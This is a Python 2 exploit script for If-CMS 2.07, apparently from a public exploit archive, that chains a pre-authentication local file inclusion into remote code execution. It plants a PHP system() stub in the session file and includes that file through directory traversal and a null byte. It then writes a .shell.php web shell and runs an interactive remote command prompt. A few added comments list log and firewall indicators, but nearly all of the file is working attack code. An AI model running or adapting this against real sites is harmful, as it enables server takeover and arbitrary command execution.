/exploits/php/webapps/16980.py
- #!/usr/bin/python
- # ~INFORMATION
- # Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
- # Author: TecR0c
- # Date: 13/3/2011
- # Software link: http://bit.ly/hh9ZB4
- # Tested on: Linux bt
- # Version: 2.07
- # PHP.ini Settings: magic_quotes_gpc = Off
-
- import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass
- from optparse import OptionParser
- from urlparse import urlparse,urljoin
- from urllib import urlopen
- from cookielib import CookieJar
-
__CONTACT__ = "TecR0c(tecr0c@tecninja.net)"
__DATE__ = "13.3.2011"

# Command line: one positional target URL plus an optional HTTP proxy (-p host:port).
usage = 'Example : %s http://localhost/ncms/ -p 127.0.0.1:8080' % __file__
parser = OptionParser(usage=usage)
parser.add_option(
    "-p", "--proxy",
    type="string", action="store", dest="proxy",
    help="HTTP Proxy <server>:<port>",
)
options, args = parser.parse_args()

if options.proxy:
    # Note: the original message has no space between 'Proxy' and the value.
    print '[+] Using Proxy' + options.proxy
-
# Pool of browser User-Agent strings; one is picked at random per run so the
# requests do not carry the urllib2 default User-Agent.
agents = [
    "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
    "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
    "Google Chrome 0.2.149.29 (Windows XP)",
    "Opera 9.25 (Windows Vista)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
    "Opera/8.00 (Windows NT 5.1; U; en)",
]
agent = random.choice(agents)

# Directory-traversal prefix and the session directory it is aimed at
# (see writeOutShell); both are hard-coded guesses about the target's layout.
traversal = '../../../../../../../../../../../..'
sessionLocation = '/var/lib/php5/'
-
def banner():
    """Clear the terminal and print the header one character at a time.

    Uses the module-level __CONTACT__ and __DATE__ strings; the short sleep
    per character is purely cosmetic.
    """
    os.system("clear" if os.name == "posix" else "cls")
    header = '''
|----------------------------------------|
|Exploit: If-CMS 2.07 LFI RCE
|Author: %s
|Date: %s
|----------------------------------------|\n
''' % (__CONTACT__, __DATE__)
    for ch in header:
        print "\b%s" % ch,
        sys.stdout.flush()
        time.sleep(0.005)
-
def injectPayload():
    """Send the PHP stub to the target through the `newlang` query parameter.

    The stub is sent unencoded in the URL; presumably the application stores
    `newlang` in the PHP session, since writeOutShell later includes the
    session file (not verifiable from this script alone). Failures are only
    reported as '[-] Failed', not fatal: the caller carries on regardless.

    Defensive note: `newlang` should be validated against the set of installed
    language identifiers on the server side; a request whose `newlang` value
    contains a PHP open tag is a high-signal detection indicator in access logs.
    """
    webSiteUrl = url.geturl()+'index.php?newlang=<?php;system(base64_decode($_REQUEST[cmd]));?>'
    try:
        opener.open(webSiteUrl)
    except:  # bare except: any network or HTTP error is swallowed after the message
        print '[-] Failed'
-
def proxyCheck():
    """Probe the configured proxy with a TCP connect; exit(1) on any failure.

    Does nothing when no proxy was given. The probe connection is never
    closed explicitly; it is left to garbage collection.
    """
    if not options.proxy:
        return
    try:
        probe = httplib.HTTPConnection(options.proxy)
        probe.connect()
        print "[+] Using Proxy Server:", options.proxy
    except socket.timeout:
        print "[-] Proxy Timed Out\n"
        sys.exit(1)
    except NameError:
        print "[-] Proxy Not Given\n"
        sys.exit(1)
    except:  # bare except: connection refused, DNS failure, etc.
        print "[-] Proxy Failed\n"
        sys.exit(1)
-
def getProxy():
    """Return a urllib2.ProxyHandler routing HTTP through the `-p` proxy.

    The socket.timeout handler is kept for parity with the original; building
    a ProxyHandler does not itself open a connection.
    """
    try:
        handler = urllib2.ProxyHandler({'http': options.proxy})
    except socket.timeout:
        print "\n[-] Proxy Timed Out"
        sys.exit(1)
    return handler
-
# Shared cookie-aware opener used by every request; the proxy handler goes
# first in the chain when a proxy was given. The chosen User-Agent is applied
# to all requests.
cj = CookieJar()
handlers = [urllib2.HTTPCookieProcessor(cj)]
if options.proxy:
    handlers.insert(0, getProxy())
opener = urllib2.build_opener(*handlers)
opener.addheaders = [('User-agent', agent)]
-
def postRequestWebShell(encodedCommand):
    """POST a base64-encoded command to `.shell.php` and return the response body.

    Args:
        encodedCommand: base64 text placed in the `cmd` form field; the stub
            written by commandLine decodes and runs it server side.

    Returns:
        The raw response body as a str.

    Exits via sys.exit() after printing '[-] Failed' on any request error.
    """
    webSiteUrl = url.geturl()+'.shell.php'
    commandToExecute = [
        ('cmd',encodedCommand)]
    cmdData = urllib.urlencode(commandToExecute)
    try:
        # Supplying a data argument makes urllib2 issue a POST.
        response = opener.open(webSiteUrl, cmdData).read()
    except:  # bare except: any network or HTTP error ends the run
        print '[-] Failed'
        sys.exit()
    return response
-
def writeOutShell(encodedCommand):
    """Request inclusion of the poisoned session file so the stub runs once.

    The PHPSESSID value is recovered from the cookie jar's string form, the
    jar is then cleared, and `newlang` is pointed at the session file via the
    module-level traversal prefix and session directory. The trailing `%00`
    relies on null-byte truncation of the include path, which current PHP
    versions no longer honor. The value in `cmd` is meant to be consumed by
    the stub seeded in injectPayload.

    Args:
        encodedCommand: base64 text for the stub's `cmd` parameter.

    Known defect (left as is): if no PHPSESSID cookie was captured,
    session_value stays None and the string concatenation below raises
    TypeError outside the try block.

    Defensive note: traversal sequences or encoded null bytes in `newlang`,
    or a session-directory path appearing in a query string, are reliable
    indicators for a WAF rule or log alert.
    """
    cookieString = str(cj)
    # str(CookieJar) renders each cookie as "<Cookie NAME=VALUE for DOMAIN...>";
    # the " f" anchor stops the capture just before " for".
    cookieSearch = re.compile(r"PHPSESSID=(.*) f")
    session_value = cookieSearch.search(cookieString)
    if session_value:
        session_value = session_value.group(1)
    cj.clear()
    webSiteUrl = url.geturl()+'index.php?cmd='+encodedCommand+'&newlang='+traversal+sessionLocation+'sess_'+session_value+'%00'
    try:
        opener.open(webSiteUrl)
    except:  # bare except: any network or HTTP error ends the run
        print '[-] Failed'
        sys.exit()
-
def commandLine():
    """Drop `.shell.php` on the target, then run an interactive command loop.

    The first command (sent through writeOutShell) writes a one-line PHP stub
    to `.shell.php`, relative to the PHP process's working directory and
    expected to be reachable next to index.php. Every line read at the prompt
    is base64-encoded and POSTed to that file via postRequestWebShell, and
    the response body is printed.

    Ctrl-C sends `rm .shell.php` and exits. EOF (Ctrl-D) raises EOFError,
    which is not caught: the loop dies with a traceback and the stub is left
    on the target.
    """
    encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php"
    encodedCommand = base64.b64encode(encodedCommand)
    writeOutShell(encodedCommand)
    # Local name shadows the enclosing function; harmless inside the body.
    commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)
    while True:
        try:
            command = raw_input(commandLine)
            encodedCommand = base64.b64encode(command)
            response = postRequestWebShell(encodedCommand)
            print response
        except KeyboardInterrupt:
            # Best-effort cleanup before exiting.
            encodedCommand = base64.b64encode('rm .shell.php')
            postRequestWebShell(encodedCommand)
            print "\n[!] Removed .shell.php\n"
            sys.exit()
-
if "__main__" == __name__:
    banner()
    try:
        # The positional target URL becomes a module global read by the other
        # functions. A missing argument raises IndexError and lands in the
        # help path; the bare except also catches anything else.
        url=urlparse(args[0])
    except:
        parser.print_help()
        sys.exit()
    # Return value discarded: the module-level opener already holds the
    # proxy handler; this call only repeats its (non-network) construction.
    getProxy()
    proxyCheck()
    injectPayload()
    commandLine()